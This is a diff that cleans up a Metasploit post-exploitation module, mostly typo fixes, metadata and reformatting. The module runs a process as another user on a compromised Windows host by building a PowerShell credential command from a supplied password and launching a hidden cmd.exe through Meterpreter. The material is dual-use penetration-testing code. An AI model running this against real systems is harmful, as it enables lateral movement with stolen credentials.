@@ -9,8 +9,8 @@ class MetasploitModule < Msf::Post
     super(
       update_info(
         info,
-        'Name' => 'Windows \'Run As\' Using Powershell',
-        'Description' => %q( This module will start a process as another user using powershell. ),
+        'Name' => "Windows 'Run As' Using PowerShell",
+        'Description' => %q{ This module will start a process as another user using PowerShell. },
         'License' => MSF_LICENSE,
         'Author' => ['p3nt4'],
         'Platform' => ['win'],
@@ -21,6 +21,11 @@ class MetasploitModule < Msf::Post
               stdapi_sys_process_execute
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
         }
       )
     )
@@ -32,7 +37,7 @@ class MetasploitModule < Msf::Post
         OptString.new('EXE', [true, 'Executable to run', 'cmd.exe']),
         OptString.new('ARGS', [false, 'Arguments', nil]),
         OptString.new('PATH', [true, 'Working Directory', 'C:\\']),
-        OptBool.new('CHANNELIZE', [true, 'Chanelize output, required for reading output or interracting', true]),
+        OptBool.new('CHANNELIZE', [true, 'Channelize output, required for reading output or interacting', true]),
         OptBool.new('INTERACTIVE', [true, 'Run interactively', true]),
         OptBool.new('HIDDEN', [true, 'Hide the window', true])
       ]
@@ -40,7 +45,7 @@ class MetasploitModule < Msf::Post
   end
 
   def run
-    raise "Powershell is required" if !have_powershell?
+    fail_with(Failure::BadConfig, 'PowerShell is not available') unless have_powershell?
 
     # Variable Setup
     user = datastore['user']
@@ -52,16 +57,19 @@ class MetasploitModule < Msf::Post
     path = datastore['path'].gsub('\\', '\\\\\\\\')
     channelized = datastore['channelize']
     hidden = datastore['hidden']
-    if user.include? '\\'
+
+    if user.include?('\\')
       domain = user.split('\\')[0]
       user = user.split('\\')[1]
     end
+
     # Check if session is interactive
     if !session.interacting && inter
       print_error('Interactive mode can only be used in a meterpreter console')
       print_error("Use 'run post/windows/manage/run_as_psh USER=x PASS=X EXE=X' or 'SET INTERACTIVE false'")
-      raise 'Invalide console'
+      raise 'Invalid console'
     end
+
     # Prepare powershell script
     scr = "$pw = convertto-securestring '#{pass}' -asplaintext -force; "
     scr << "$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist '#{domain}\\#{user}',$pw; "
@@ -69,22 +77,27 @@ class MetasploitModule < Msf::Post
     if args && args != ''
       scr << " -argumentlist '#{args}' "
     end
+
     if hidden
       print_status('Hidden mode may not work on older powershell versions, if it fails, try HIDDEN=false')
       scr << ' -WindowStyle hidden'
     end
+
     scr = " -c \"#{scr}\""
     # Execute script
-    p = client.sys.process.execute("powershell.exe", scr,
-                                   'Channelized' => channelized,
-                                   'Desktop' => false,
-                                   'Session' => false,
-                                   'Hidden' => true,
-                                   'Interactive' => inter,
-                                   'InMemory' => false,
-                                   'UseThreadToken' => false)
+    p = client.sys.process.execute(
+      'powershell.exe', scr,
+      'Channelized' => channelized,
+      'Desktop' => false,
+      'Session' => false,
+      'Hidden' => true,
+      'Interactive' => inter,
+      'InMemory' => false,
+      'UseThreadToken' => false
+    )
     print_status("Process #{p.pid} created.")
     print_status("Channel #{p.channel.cid} created.") if p.channel
+
     # Process output
     if inter && p.channel
       client.console.interact_with_channel(p.channel)
